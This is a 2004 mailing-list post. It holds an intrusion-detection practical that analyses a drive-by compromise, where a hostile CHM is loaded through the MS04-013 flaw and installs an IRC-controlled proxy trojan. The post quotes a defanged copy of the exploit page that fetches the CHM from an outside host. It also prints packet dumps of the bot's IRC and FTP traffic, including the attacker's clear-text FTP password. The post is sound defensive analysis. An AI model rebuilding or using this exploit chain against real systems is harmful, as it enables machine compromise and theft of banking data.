Re: LOGS: GIAC GCIA Version 3.4 Practical Detect Alva Lease 'Skip' Duckwall IV

Hi,

A wonderful detect. Hope to see more DIY detects and analysis.

BTW, sorry could not contribute to comments. Good luck.

Rgds.

----- Original Message ----- 
From: <skip1@xxxxxxxxxxxx>
To: "Intrusions List \(GCIA Practicals\)" <intrusions@xxxxxxxxxxxxxx>
Sent: Monday, May 24, 2004 8:47 PM
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect Alva
Lease 'Skip' Duckwall IV


>
> This is my second attempt at sending this to the list.  Hopefully it will
> go better than the first attempt....
>
> Anyways, My name is Alva Lease 'Skip' Duckwall and here is my first detect
> writeup.  Feel free to comment and abuse it as you see fit ;-)
>
> Alva Lease 'Skip' Duckwall IV
> CISSP, RHCE, SCSA
> ---------------------------------------------
>
> 1. Source of trace
>
> These detects were captured on a stealth interface connected to a hub.
> The DSL modem network port for my home network is also plugged into
> that hub so all traffic in and out of the DSL modem was captured.
>
> These traces were captured using 'tcpdump -w (filename) -s0'.
>
> 2. Detect was generated by:
>
> This is a reproduction of a compromise that occurred on the network at
> work. For various reasons, I was not allowed to use the log data
> gathered from work for this detect, so I did the next best thing,
> reproduce it as best I could from home under well-controlled
> circumstances.  It should be noted that I only proceeded with the home
> network option after it was determined that my workplace wasn't going
> to take any legal action against the site(s) in question.
>
> Predicated on the above information, I consider this to be a 'lab
> generated' detect even though the practical assignment states "It must
> be stressed that our definition of a lab generated detect means detects
> generated and obtained from completely separated and non-Internet
> connected systems."  My VMWARE environment was connected to the
> Internet so I could capture the entire attack as part of the
> reproduction.
>
> A little history: We were alerted to a problem with the host in
> question when a signature fired that detected attempts to join an IRC
> server on the Internet. Further investigation of this event indicated
> that the host in question was attempting to sign into the remote server
> with an IRC nickname of "X-bot17234-29327" where the numbers between
> the 'X-bot' portion of the nickname and the dash changed, while the
> numbers after the dash did not.  The compromised machine would also
> transmit via FTP files to the master server.  Furthermore, the machine
> in question would try to connect to the IRC channel and FTP files every
> 30 minutes with a high degree of accuracy (within 3 seconds).  Further
> explanation will be discussed in the 'attack mechanism' portion of this
> analysis.
>
> After a thorough examination of all logs available to me as well as all
> IDS events for the machine in question, the method used to compromise
> the machine was discovered.  I then replicated the event at home and
> captured all the packets after it was determined that no legal action
> was to be taken against any of the participants.
>
> Both of the servers had been taken offline.
>
> 3. Probability source address was spoofed:
>
> The source addresses were not spoofed since all of the traffic was TCP.
> However, I believe that both of the hosts involved were compromised.
>
> 4. Description of the attack
>
> This attack has two major components.  The first component is an
> exploit of the bug described in MS04-013 (as well as CAN-2004-0380)
> which allows the second exploit to be downloaded and executed without
> user intervention.  The second exploit uses a carefully crafted
> Microsoft Compressed Help Manual (CHM file) to execute arbitrary code.
> This combination of attacks is popular in many phishing attacks (see
> correlations) and in some extreme examples, like the one I provide, it
> can lead to compromise of the machine being attacked.
>
> The basic timeline of events is as follows:
>
> 1) The user visits an untrusted (or possibly hacked) website which will
> open a popup window with the first set of exploit code in it.
> 2) The first exploit (MS04-013/CAN-2004-0380) downloads the hostile CHM
> code to the local machine.
> 3) The hostile CHM code is executed which will then download the trojan
> components.
> 4) The trojan components are then installed and begins to execute.
>
>
> 5. Attack mechanism
>
> The website that appeared in a popup window was www.news-
> distributor.com.
>
> This is the index page from this site:
>
> " <html> <body> <script> var
> oWin=window.open("msits.html","Child","width=50, height=50,
> screenX,left=5000, screenY,top=5000, menubar=no"); </script> <IMG
> src="http://216.55.161.45/cgi-bin/stats/PageStat.pl"; WIDTH="1"
> HEIGHT="1">
> </body> "
>
> This page opens the http://www.news-distributor.com/msits.html page in
> yet another popup window.  It also runs a CGI script that is possibly
> used to track information about the users visiting this page.
>
> The contents of http://www.news-distributor.com/msits.html (Please note
> that exploit has been obfuscated to prevent detection from any anti-
> virus software. It WILL NOT work in its current form. )
>
> " <html> <body onUnload='confirm("Do you want to close this window?")'>
> <script> self.moveTo(5000,5000); </script><object data="ms-
> its(colon)mhtml(colon)file(colon)//C(colon)\\MAIN.MHT(bang)http://www.n
> ews-distributor.com(slash)(slash)main.chm(colon)(colon)/main.htm"
> type="text/x-scriptlet"></object> </body> </html> "
>
> This code exploits the vulnerability described in MS04-013/CAN-2004-
> 0380 to download and execute the chm file at http://www.news-
> distributor.com/main.chm.
>
> According to the network detects, the following files were downloaded
> from 216.55.161.45: svchost.ini, SVCHOST.EXE, dlcomcnf.exe, url.txt,
> and title.txt.
>
> SVCHOST.EXE is the trojan.  A quick look at the binary shows that it
> was compressed with UPX.  Further examination of the uncompressed
> binary yielded references to it acting as a SOCKS proxy.  There was
> also a reference to a slightly different pagestat.pl url named
> pagestat2.pl.  Perhaps this second cgi script was put there to gather
> some sort of statistics as to the success rate of infection. As of this
> writing no major antivirus or anti-spyware software was able to
> identify it.  A sample was submitted to Symantec and McAfee.
>
> svchost.ini is the control file for the trojan.  The control file
> contains encrypted statements.  More than likely it contains the
> information needed to log into the IRC server and the FTP server.
>
> dlcomcnf.exe is a self extracting archive that contains a DLL.
>
> Two text files url.txt and title.txt contain URLs and title keywords
> that the trojan looks for. Examples contained in url.txt are
> 'dallasfed.org', 'ml.com', and 'jpmorgan.com'.  Examples from title.txt
> are 'bank', 'money', 'mail', and 'log'.
>
> The following detect shows communication from the VMWARE box to
> 216.55.161.45 on TCP port 34902.  This appears to be IRC traffic.  I
> have not shown any of the channel listings since it would give away the
> names and IP addresses of compromised machines.  The address has been
> obfuscated and the checksums have been changed.
>
> 23:12:47.847453 IP 10.10.10.138.1106 > 216.55.161.45.34902: S
> 3639828070:3639828070(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
> 23:12:47.924763 IP 216.55.161.45.34902 > 10.10.10.138.1106: S
> 4063190951:4063190951(0) ack 3639828071 win 5840 <mss
> 1460,nop,nop,sackOK> (DF)
> |23:12:47.925046 IP 10.10.10.138.1106 > 216.55.161.45.34902: . ack 1
> win 17520 (DF)
> 0|3:12:48.937192 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 1:23(22)
> ack 1 win 17520 (DF)
> 0x0000 4500 003e 0409 4000 8006 f6b0 0a0a 0a8a E..>..@.....E.A.
> 0x0010 d837 a12d 0452 8856 d8f3 5e67 f22f 5fa8 .7.-.R.V..^g./_.
> 0x0020 5018 4470 f283 0000 4e49 434b 2058 2d62 P.Dp....NICK.X-b
> 0x0030 6f74 3939 3238 2d35 3939 3539 0d0a     ot9928-59959..
> 23:12:49.010010 IP 216.55.161.45.34902 > 10.10.10.138.1106: . ack 23
> win 5840 (DF)
>
> Here the IRC nickname is set to X-bot9928-59959.  It is worth noting
> that there was a port listening on the machine 59959 that might be a
> SOCKS proxy, since there are references to SOCKS in the binary.
>
> 23:12:49.010583 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 23:82(59)
> ack 1 win 17520 (DF)
> 0x0000 4500 0063 040a 4000 8006 f68a 0a0a 0a8a E..c..@.....E.A.
> 0x0010 d837 a12d 0452 8856 d8f3 5e7d f22f 5fa8 .7.-.R.V..^}./_.
> 0x0020 5018 4470 3258 0000 5553 4552 204a 6262 P.Dp2X..USER.Jbb
> 0x0030 3467 3639 3932 3841 3120 4855 4748 2d38 4g69928A1.HUGH-8
> 0x0040 4e31 4a41 4a59 4255 5920 7365 7276 6572 N1JAJYBUY.server
> 0x0050 203a 582d 626f 7439 3932 382d 3539 3935 .:X-bot9928-5995
> 0x0060 390d 0a                                9..
>
>  N1JaJYBUY is maybe somebody's name?
>
> 23:12:49.086404 IP 216.55.161.45.34902 > 10.10.10.138.1106: . ack 82
> win 5840 (DF)
> 23:12:49.203219 IP 216.55.161.45.34902 > 10.10.10.138.1106: P
> 1:1067(1066) ack 82 win 5840 (DF)
> 0x0000 4500 0452 6bca 4000 3706 d3db d837 a12d E..Rk.@.7....7.-
> 0x0010 0a0a 0a8a 8856 0452 f22f 5fa8 d8f3 5eb8 E.A..V.R./_...^.
> 0x0020 5018 16d0 2a84 0000 3a73 6572 7665 722e P...*...:server.
> 0x0030 6461 6c2e 6e65 7420 3030 3120 582d 626f dal.net.001.X-bo
> 0x0040 7439 3932 382d 3539 3935 3920 3a57 656c t9928-59959.:Wel
> 0x0050 636f 6d65 2074 6f20 7468 6520 496e 7465 come.to.the.Inte
> 0x0060 726e 6574 2052 656c 6179 204e 6574 776f rnet.Relay.Netwo
> 0x0070 726b 2058 2d62 6f74 3939 3238 2d35 3939 rk.X-bot9928-599
> 0x0080 3539 215e 4a62 6234 6736 3939 3240 6464 59!^Jbb4g6992@dd
> 0x0090 6464 6464 6464 6464 6464 6464 2e64 6464 dddddddddddd.ddd
> 0x00a0 642e 6464 642e 6464 6464 6464 6464 642e d.ddd.ddddddddd.
> 0x00b0 6464 640d 0a3a 7365 7276 6572 2e64 616c ddd..:server.dal
> 0x00c0 2e6e 6574 2030 3032 2058 2d62 6f74 3939 .net.002.X-bot99
> 0x00d0 3238 2d35 3939 3539 203a 596f 7572 2068 28-59959.:Your.h
> 0x00e0 6f73 7420 6973 2073 6572 7665 722e 6461 ost.is.server.da
> 0x00f0 6c2e 6e65 742c 2072 756e 6e69 6e67 2052 l.net,.running.R
> 0x0100 7573 4e65 742d 312e 342e 3270 7265 5f31 usNet-1.4.2pre_1
> 0x0110 3620 286f 7269 672e 2032 2e31 302e 3370 6.(orig..2.10.3p
> 0x0120 3529 0d0a 3a73 6572 7665 722e 6461 6c2e 5)..:server.dal.
> 0x0130 6e65 7420 3030 3320 582d 626f 7439 3932 net.003.X-bot992
> 0x0140 382d 3539 3935 3920 3a54 6869 7320 7365 8-59959.:This.se
> 0x0150 7276 6572 2077 6173 2063 7265 6174 6564 rver.was.created
> 0x0160 2054 7565 204d 6172 2032 2032 3030 3420 .Tue.Mar.2.2004.
> 0x0170 6174 2032 313a 3530 3a31 3020 5053 540d at.21:50:10.PST.
> 0x0180 0a3a 7365 7276 6572 2e64 616c 2e6e 6574 .:server.dal.net
> 0x0190 2030 3034 2058 2d62 6f74 3939 3238 2d35 .004.X-bot9928-5
> 0x01a0 3939 3539 2073 6572 7665 722e 6461 6c2e 9959.server.dal.
> 0x01b0 6e65 7420 322e 3130 2e33 7035 2061 6f4f net.2.10.3p5.aoO
> 0x01c0 6972 7778 2061 6263 6569 496b 6c6d 6e6f irwx.abceiIklmno
> 0x01d0 4f70 7172 7374 767a 0d0a 3a73 6572 7665 Opqrstvz..:serve
> 0x01e0 722e 6461 6c2e 6e65 7420 3030 3520 582d r.dal.net.005.X-
> 0x01f0 626f 7439 3932 382d 3539 3935 3920 5052 bot9928-59959.PR
> 0x0200 4546 4958 3d28 6f76 2940 2b20 4d4f 4445 EFIX=(ov)@+.MODE
> 0x0210 533d 3320 4348 414e 5459 5045 533d 2326 S=3.CHANTYPES=#&
> 0x0220 212b 204d 4158 4348 414e 4e45 4c53 3d31 !+.MAXCHANNELS=1
> 0x0230 3020 4e49 434b 4c45 4e3d 3331 2054 4f50 0.NICKLEN=31.TOP
> 0x0240 4943 4c45 4e3d 3235 3520 4b49 434b 4c45 ICLEN=255.KICKLE
> 0x0250 4e3d 3235 3520 4e45 5457 4f52 4b3d 5275 N=255.NETWORK=Ru
> 0x0260 734e 6574 2043 4841 4e4d 4f44 4553 3d62 sNet.CHANMODES=b
> 0x0270 6549 2c6b 2c6c 2c61 6369 6d6e 7073 7274 eI,k,l,acimnpsrt
> 0x0280 7a20 3a61 7265 2073 7570 706f 7274 6564 z.:are.supported
> 0x0290 2062 7920 7468 6973 2073 6572 7665 720d .by.this.server.
> 0x02a0 0a3a 7365 7276 6572 2e64 616c 2e6e 6574 .:server.dal.net
> 0x02b0 2032 3531 2058 2d62 6f74 3939 3238 2d35 .251.X-bot9928-5
> 0x02c0 3939 3539 203a 5468 6572 6520 6172 6520 9959.:There.are.
> 0x02d0 3930 3620 7573 6572 7320 616e 6420 3020 906.users.and.0.
> 0x02e0 7365 7276 6963 6573 206f 6e20 3120 7365 services.on.1.se
> 0x02f0 7276 6572 730d 0a3a 7365 7276 6572 2e64 rvers..:server.d
> 0x0300 616c 2e6e 6574 2032 3533 2058 2d62 6f74 al.net.253.X-bot
> 0x0310 3939 3238 2d35 3939 3539 2034 203a 756e 9928-59959.4.:un
> 0x0320 6b6e 6f77 6e20 636f 6e6e 6563 7469 6f6e known.connection
> 0x0330 730d 0a3a 7365 7276 6572 2e64 616c 2e6e s..:server.dal.n
> 0x0340 6574 2032 3534 2058 2d62 6f74 3939 3238 et.254.X-bot9928
> 0x0350 2d35 3939 3539 2031 3320 3a63 6861 6e6e -59959.13.:chann
> 0x0360 656c 7320 666f 726d 6564 0d0a 3a73 6572 els.formed..:ser
> 0x0370 7665 722e 6461 6c2e 6e65 7420 3235 3520 ver.dal.net.255.
> 0x0380 582d 626f 7439 3932 382d 3539 3935 3920 X-bot9928-59959.
> 0x0390 3a49 2068 6176 6520 3930 3620 7573 6572 :I.have.906.user
> 0x03a0 732c 2030 2073 6572 7669 6365 7320 616e s,.0.services.an
> 0x03b0 6420 3020 7365 7276 6572 730d 0a3a 7365 d.0.servers..:se
> 0x03c0 7276 6572 2e64 616c 2e6e 6574 2032 3635 rver.dal.net.265
> 0x03d0 2058 2d62 6f74 3939 3238 2d35 3939 3539 .X-bot9928-59959
> 0x03e0 203a 4375 7272 656e 7420 6c6f 6361 6c20 .:Current.local.
> 0x03f0 7573 6572 733a 2039 3036 2020 4d61 783a users:.906..Max:
> 0x0400 2031 3037 300d 0a3a 7365 7276 6572 2e64 .1070..:server.d
> 0x0410 616c 2e6e 6574 2032 3636 2058 2d62 6f74 al.net.266.X-bot
> 0x0420 3939 3238 2d35 3939 3539 203a 4375 7272 9928-59959.:Curr
> 0x0430 656e 7420 676c 6f62 616c 2075 7365 7273 ent.global.users
> 0x0440 3a20 3930 3620 204d 6178 3a20 3130 3730 :.906..Max:.1070
> 0x0450 0d0a                                   ..
>
> This section says that there are 906 users on the system out of 1070.
> This seems to indicate that there are at least 900 machines that are
> infected with this trojan.  Further analysis of the channel seems to
> bear this out.  I'm not including this channel information because it
> contains IP addresses and the SOCKS port information.
>
> 23:12:49.290751 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 82:99(17)
> ack 1067 win 16454 (DF)
> 0x0000 4500 0039 040c 4000 8006 f6b2 0a0a 0a8a E..9..@.....E.A.
> 0x0010 d837 a12d 0452 8856 d8f3 5eb8 f22f 63d2 .7.-.R.V..^../c.
> 0x0020 5018 4046 ab73 0000 4a4f 494e 203a 2373 P.@xxxxxxxxxx:#s
> 0x0030 7570 6572 746f 790d 0a                 upertoy..
>
> The channel name is #supertoy.  Perhaps this is the name of the trojan.
>
> Here is some of the FTP traffic.  Please note that this traffic was
> captured before the previous IRC traffic.  This traffic is presented
> out of order because I felt it was better to present the IRC traffic
> first.
>
> 22:28:09.964008 10.10.10.138.3604 > 216.55.161.45.ftp: S
> 535955192:535955192(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
>
> 22:28:10.038087 216.55.161.45.ftp > 10.10.10.138.3604: S
> 3993608827:3993608827(0) ack 535955193 win 5840 <mss
> 1460,nop,nop,sackOK>
>
> 22:28:10.038414 10.10.10.138.3604 > 216.55.161.45.ftp: . ack 1 win
> 64240 (DF)
>
> 22:28:10.113441 216.55.161.45.ftp > 10.10.10.138.3604: P 1:21(20) ack 1
> win 5840 (DF)
>
> 22:28:10.114372 10.10.10.138.3604 > 216.55.161.45.ftp: P 1:14(13) ack
> 21 win 64220 (DF)
> 0x0000   4500 0035 4f1a 4000 8006 aba8 0a0a 0a8a       E..5O.@.....E.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 06f9 ee09 a290       .7.-............
> 0x0020   5018 fadc f155 0000 5553 4552 2061 7061       P....U..USER.apa
> 0x0030   6368 650d 0a                                  che..
>
> Username is apache.  He probably logs directly into the webroot for the
> machine.
>
> 22:28:10.187860 216.55.161.45.ftp > 10.10.10.138.3604: . ack 14 win
> 5840 (DF)
>
> 22:28:10.190064 216.55.161.45.ftp > 10.10.10.138.3604: P 21:55(34) ack
> 14 win 5840 (DF)
> 0x0000   4500 004a 70c6 4000 3706 d2e7 d837 a12d       E..Jp.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a290 1ff2 0706       E.A.............
> 0x0020   5018 16d0 8bfd 0000 3333 3120 506c 6561       P.......331.Plea
> 0x0030   7365 2073 7065 6369 6679 2074 6865 2070       se.specify.the.p
> 0x0040   6173 7377 6f72 642e 0d0a                      assword...
>
> 22:28:10.190827 10.10.10.138.3604 > 216.55.161.45.ftp: P 14:31(17) ack
> 55 win 64186 (DF)
> 0x0000   4500 0039 4f1e 4000 8006 aba0 0a0a 0a8a       E..9O.@.....E.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 0706 ee09 a2b2       .7.-............
> 0x0020   5018 faba 62ed 0000 5041 5353 204d 6e37       P...b...PASS.Mn7
> 0x0030   507a 3431 5f63 6c0d 0a                        Pz41_cl..
>
> A password of "Mn7Pz41_cl".  I wish I could get my users to use such a
> secure password.  Of course it doesn't help that it was sent in clear
> text. ;-)
>
> 22:28:10.268202 216.55.161.45.ftp > 10.10.10.138.3604: P 55:88(33) ack
> 31 win 5840 (DF)
> 0x0000   4500 0049 70c7 4000 3706 d2e7 d837 a12d       E..Ip.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a2b2 1ff2 0717       E.A.............
> 0x0020   5018 16d0 6eb8 0000 3233 3020 4c6f 6769       P...n...230.Logi
> 0x0030   6e20 7375 6363 6573 7366 756c 2e20 4861       n.successful..Ha
> 0x0040   7665 2066 756e 2e0d 0a                        ve.fun...
>
> 22:28:10.269584 10.10.10.138.3604 > 216.55.161.45.ftp: P 31:44(13) ack
> 88 win 64153 (DF)
> 0x0000   4500 0035 4f22 4000 8006 aba0 0a0a 0a8a       E..5O"@.....E.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 0717 ee09 a2d3       .7.-............
> 0x0020   5018 fa99 8359 0000 4d4b 4420 746f 796c       P....Y..MKD.toyl
> 0x0030   6f67 730d 0a                                  ogs..
>
> 22:28:10.344596 216.55.161.45.ftp > 10.10.10.138.3604: P 88:128(40) ack
> 44 win 5840 (DF)
> 0x0000   4500 0050 70c8 4000 3706 d2df d837 a12d       E..Pp.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a2d3 1ff2 0724       E.A............$
> 0x0020   5018 16d0 338b 0000 3535 3020 4372 6561       P...3...550.Crea
> 0x0030   7465 2064 6972 6563 746f 7279 206f 7065       te.directory.ope
> 0x0040   7261 7469 6f6e 2066 6169 6c65 642e 0d0a       ration.failed...
>
> 22:28:10.345424 10.10.10.138.3604 > 216.55.161.45.ftp: P 44:57(13) ack
> 128 win 64113 (DF)
> 0x0000   4500 0035 4f26 4000 8006 ab9c 0a0a 0a8a       E..5O&@.....E.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 0724 ee09 a2fb       .7.-.......$....
> 0x0020   5018 fa71 8d40 0000 4357 4420 746f 796c       P..q.@..CWD.toyl
> 0x0030   6f67 730d 0a                                  ogs..
>
> 22:28:10.419245 216.55.161.45.ftp > 10.10.10.138.3604: P 128:165(37)
> ack 57 win 5840 (DF)
> 0x0000   4500 004d 70c9 4000 3706 d2e1 d837 a12d       E..Mp.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a2fb 1ff2 0731       E.A............1
> 0x0020   5018 16d0 4724 0000 3235 3020 4469 7265       P...G$..250.Dire
> 0x0030   6374 6f72 7920 7375 6363 6573 7366 756c       ctory.successful
> 0x0040   6c79 2063 6861 6e67 6564 2e0d 0a              ly.changed...
>
> It attempts to make a directory called 'toylogs'.  Perhaps supertoy is
> the name of the trojan after all.  The directory creation failed
> because it already existed.
>
> 22:28:10.420113 10.10.10.138.3604 > 216.55.161.45.ftp: P 57:73(16) ack
> 165 win 64076 (DF)
> 0x0000   4500 0038 4f2a 4000 8006 ab95 0a0a 0a8a       E..8O*@.....E.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 0731 ee09 a320       .7.-.......1....
> 0x0020   5018 fa4c 5c8a 0000 4d4b 4420 3037 2d30       P..L\...MKD.07-0
> 0x0030   342d 3230 3034 0d0a                           4-2004..
>
> 22:28:10.494411 216.55.161.45.ftp > 10.10.10.138.3604: P 165:205(40)
> ack 73 win 5840 (DF)
> 0x0000   4500 0050 70ca 4000 3706 d2dd d837 a12d       E..Pp.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a320 1ff2 0741       E.A............A
> 0x0020   5018 16d0 3321 0000 3535 3020 4372 6561       P...3!..550.Crea
> 0x0030   7465 2064 6972 6563 746f 7279 206f 7065       te.directory.ope
> 0x0040   7261 7469 6f6e 2066 6169 6c65 642e 0d0a       ration.failed...
>
> 22:28:10.495175 10.10.10.138.3604 > 216.55.161.45.ftp: P 73:89(16) ack
> 205 win 64036 (DF)
> 0x0000   4500 0038 4f2e 4000 8006 ab91 0a0a 0a8a       E..8O.@.....E.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 0741 ee09 a348       .7.-.......A...H
> 0x0020   5018 fa24 666e 0000 4357 4420 3037 2d30       P..$fn..CWD.07-0
> 0x0030   342d 3230 3034 0d0a                           4-2004..
>
> 22:28:10.569571 216.55.161.45.ftp > 10.10.10.138.3604: P 205:242(37)
> ack 89 win 5840 (DF)
> 0x0000   4500 004d 70cb 4000 3706 d2df d837 a12d       E..Mp.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a348 1ff2 0751       E.A........H...Q
> 0x0020   5018 16d0 46b7 0000 3235 3020 4469 7265       P...F...250.Dire
> 0x0030   6374 6f72 7920 7375 6363 6573 7366 756c       ctory.successful
> 0x0040   6c79 2063 6861 6e67 6564 2e0d 0a              ly.changed...
>
> It tries to create a directory called '07-04-2004' or April 7, 2004.
> The directory creation again fails because it already exists.  This is
> the date I ran and gathered these detects.
>
> 22:28:10.570516 10.10.10.138.3604 > 216.55.161.45.ftp: P 89:130(41) ack
> 242 win 63999 (DF)
> 0x0000   4500 0051 4f32 4000 8006 ab74 0a0a 0a8a       E..QO2@....tE.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 0751 ee09 a36d       .7.-.......Q...m
> 0x0020   5018 f9ff 7173 0000 4d4b 4420 3030 4544       P...qs..MKD.00ED
> 0x0030   4331 3143 2d38 4132 382d 3436 3146 2d42       C11C-8A28-461F-B
> 0x0040   4533 3033 3344 4331 3442 3431 3545 350d       E3033DC14B415E5.
> 0x0050   0a                                             .
>
> 22:28:10.646047 216.55.161.45.ftp > 10.10.10.138.3604: P 242:313(71)
> ack 130 win 5840 (DF)
> 0x0000   4500 006f 70cc 4000 3706 d2bc d837 a12d       E..op.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a36d 1ff2 077a       E.A........m...z
> 0x0020   5018 16d0 b16f 0000 3235 3720 222f 746f       P....o..257."/to
> 0x0030   796c 6f67 732f 3037 2d30 342d 3230 3034       ylogs/07-04-2004
> 0x0040   2f30 3045 4443 3131 432d 3841 3238 2d34       /00EDC11C-8A28-4
> 0x0050   3631 462d 4245 3330 3333 4443 3134 4234       61F-BE3033DC14B4
> 0x0060   3135 4535 2220 6372 6561 7465 640d 0a         15E5".created..
>
> 22:28:10.647366 10.10.10.138.3604 > 216.55.161.45.ftp: P 130:171(41)
> ack 313 win 63928 (DF)
> 0x0000   4500 0051 4f36 4000 8006 ab70 0a0a 0a8a       E..QO6@....pE.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 077a ee09 a3b4       .7.-.......z....
> 0x0020   5018 f9b8 7b3e 0000 4357 4420 3030 4544       P...{>..CWD.00ED
> 0x0030   4331 3143 2d38 4132 382d 3436 3146 2d42       C11C-8A28-461F-B
> 0x0040   4533 3033 3344 4331 3442 3431 3545 350d       E3033DC14B415E5.
> 0x0050   0a                                            .
>
> 22:28:10.722601 216.55.161.45.ftp > 10.10.10.138.3604: P 313:350(37)
> ack 171 win 5840 (DF)
> 0x0000   4500 004d 70cd 4000 3706 d2dd d837 a12d       E..Mp.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a3b4 1ff2 07a3       E.A.............
> 0x0020   5018 16d0 45f9 0000 3235 3020 4469 7265       P...E...250.Dire
> 0x0030   6374 6f72 7920 7375 6363 6573 7366 756c       ctory.successful
> 0x0040   6c79 2063 6861 6e67 6564 2e0d 0a              ly.changed...
>
> It was successful at creating a directory called '00EDC11C-8A28-461F-
> BE3033DC14B415E5'.  This appears to be some sort of unique identifier.
> I could not find it in a registry search, so I don't know how this is
> generated.
>
>
> 22:28:10.723883 10.10.10.138.3604 > 216.55.161.45.ftp: P 171:179(8) ack
> 350 win 63891 (DF)
> 0x0000   4500 0030 4f3a 4000 8006 ab8d 0a0a 0a8a       E..0O:@.....E.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 07a3 ee09 a3d9       .7.-............
> 0x0020   5018 f993 1c9d 0000 5459 5045 2049 0d0a       P.......TYPE.I..
>
> 22:28:10.797750 216.55.161.45.ftp > 10.10.10.138.3604: P 350:381(31)
> ack 179 win 5840 (DF)
> 0x0000   4500 0047 70ce 4000 3706 d2e2 d837 a12d       E..Gp.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a3d9 1ff2 07ab       E.A.............
> 0x0020   5018 16d0 9b6b 0000 3230 3020 5377 6974       P....k..200.Swit
> 0x0030   6368 696e 6720 746f 2042 696e 6172 7920       ching.to.Binary.
> 0x0040   6d6f 6465 2e0d 0a                             mode...
>
> 22:28:10.798944 10.10.10.138.3604 > 216.55.161.45.ftp: P 179:185(6) ack
> 381 win 63860 (DF)
> 0x0000   4500 002e 4f3e 4000 8006 ab8b 0a0a 0a8a       E...O>@.....E.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 07ab ee09 a3f8       .7.-............
> 0x0020   5018 f974 3de7 0000 5041 5356 0d0a            P..t=...PASV..
>
> 22:28:10.872987 216.55.161.45.ftp > 10.10.10.138 3604: P 381:431(50)
> ack 185 win 5840 (DF)
> 0x0000   4500 005a 70cf 4000 3706 d2ce d837 a12d       E..Zp.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a3f8 1ff2 07b1       E.A.............
> 0x0020   5018 16d0 4377 0000 3232 3720 456e 7465       P...Cw..227.Ente
> 0x0030   7269 6e67 2050 6173 7369 7665 204d 6f64       ring.Passive.Mod
> 0x0040   6520 2832 3136 2c35 352c 3136 312c 3435       e.(216,55,161,45
> 0x0050   2c36 352c 3232 3729 0d0a                      ,65,227)..
>
> 22:28:10.948186 10.10.10.138.3604 > 216.55.161.45.ftp: P 185:215(30)
> ack 431 win 63810 (DF)
> 0x0000   4500 0046 4f44 4000 8006 ab6d 0a0a 0a8a       E..FOD@....mE.A.
> 0x0010   d837 a12d 0e14 0015 1ff2 07b1 ee09 a42a       .7.-...........*
> 0x0020   5018 f942 bae3 0000 5354 4f52 2030 372d       P..B....STOR.07-
> 0x0030   3034 2d32 3030 342d 3135 2d32 332d 3238       04-2004-15-23-28
> 0x0040   2e74 7874 0d0a                                .txt..
>
>
> It uploads a file called 07-04-2004-15-23-28.txt.  As previously
> mentioned, 07-04-2004 is April 7, 2004.  15-23-28 is the local time
> expressed in GMT.  The VMWARE machine's internal clock was set to
> Mountain Time, while the capture machine was set to Eastern Time.
>
> 22:28:11.022498 216.55.161.45.ftp > 10.10.10.138.3604: P 431:453(22)
> ack 215 win 5840 (DF)
> 0x0000   4500 003e 70d0 4000 3706 d2e9 d837 a12d       E..>p.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a42a 1ff2 07cf       E.A........*....
> 0x0020   5018 16d0 be97 0000 3135 3020 4f6b 2074       P.......150.Ok.t
> 0x0030   6f20 7365 6e64 2064 6174 612e 0d0a            o.send.data...
>
> 22:28:11.097441 216.55.161.45.ftp > 10.10.10.138.3604: P 453:475(22)
> ack 215 win 5840 (DF)
> 0x0000   4500 003e 70d1 4000 3706 d2e8 d837 a12d       E..>p.@.7....7.-
> 0x0010   0a0a 0a8a 0015 0e14 ee09 a440 1ff2 07cf       E.A........@....
> 0x0020   5018 16d0 db64 0000 3232 3620 4669 6c65       P....d..226.File
> 0x0030   2072 6563 6569 7665 204f 4b2e 0d0a            .receive.OK...
>
> This was all the data that was sent.  Apparently it hadn't collected
> anything interesting to send home on my test system.
>
>
> 6. Correlations
>
> The vulnerability information can be found from Microsoft at
> http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx.
>
> The CVE for CAN-2004-0380 can be found at http://www.cve.mitre.org/cgi-
> bin/cvename.cgi?name=CAN-2004-0380
>
> A quick look through the Handler's diaries at isc.sans.org came up with
> a couple of blurbs on hostile chm files. Both
> http://isc.sans.org/diary.php?date=2004-04-11 and
> http://isc.sans.org/diary.php?date=2004-04-10 mention the hostile
> URL/chm files although no in-depth analysis was provided or linked to.
>
> A Google search for 'supertoy' and 'trojan' yielded references to a
> 'W32/Mooder' trojan from McAfee.  However, the description of the
> trojan doesn't match the files that were downloaded and installed.
>
> A Google search for 'xbot' and 'trojan' yielded a couple of hits.  One
> on pestpatrol, which has a listing for "Backdoor.IRC.XBot.a" and
> another on emsisoft.com which also lists a "Backdoor.IRC.Xbot.a".
> Neither of these contain any detailed information or writeups.
>
> A google search for 'main.chm' and 'trojan' yielded several hits
> describing phishing emails that were sent out using this file name.
> None of the hits seem to describe the trojan presented here.  Links
> include:
> http://www.codephish.info/modules.php?op=modload&name=News&file=article
> &sid=113
> http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=
> article&sid=121
>
> A search of the websites for both McAfee and Symantec yielded no
> results.
>
